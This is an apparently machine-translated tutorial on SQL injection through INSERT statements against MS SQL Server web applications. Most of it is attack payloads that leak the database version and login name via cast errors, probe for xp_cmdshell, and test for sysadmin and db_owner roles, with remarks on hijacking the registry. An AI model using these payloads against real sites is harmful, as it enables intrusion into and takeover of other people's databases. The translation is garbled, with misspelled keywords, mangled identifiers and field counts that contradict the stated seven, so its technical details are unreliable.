Analysis of insert injection attacks

Yezi

When encountering some special websites, you can try to use insert injection (for example, the message version of Shenma... the premise is that you must interact with the database)
First, let's first understand the insert syntax.
Insert into table (column_name_1, column_name_2, column_n) vlaues (value_1, value_2, value_n)
When the number of value values is greater than column, an error occurs in the database.
So when we submit
A', null, null);-if an error page is returned
A', null, null);-if a normal page is returned (the single quotation mark filtering problem is not covered in this article)
It indicates that the number of fields in the current table is 7 (I don't know if I understand it ).
A', cast (@ version as int), null, null);-try to expose the database version
-Cast outputs the @ version value to the page in integer form.
A', cast (system_user as int), null);-current Login Name
A', null, null); (select count (*) from master. dbo. sysobjects where xtype = 'X' and name = 'xp _ Your shell');-whether xp_your shell exists
View Permissions
A', null, null); (select IS_SRVROLEMEMBER ('sysadmin') = 1;-sa .. if sa is thrown out, You can hijack the registry ..
A', null, null); (select IS_MEMBER ('db _ owner') = 1;-dbo .. you can backup or refer to html "> http://www.cnblogs.com/allyesno/archive/2007/07/29/835151.html
A', null, null); (select IS_MEMBER ('public') = 1;-public. This permission has never been successful ..
-If there is an error, correct it. THX.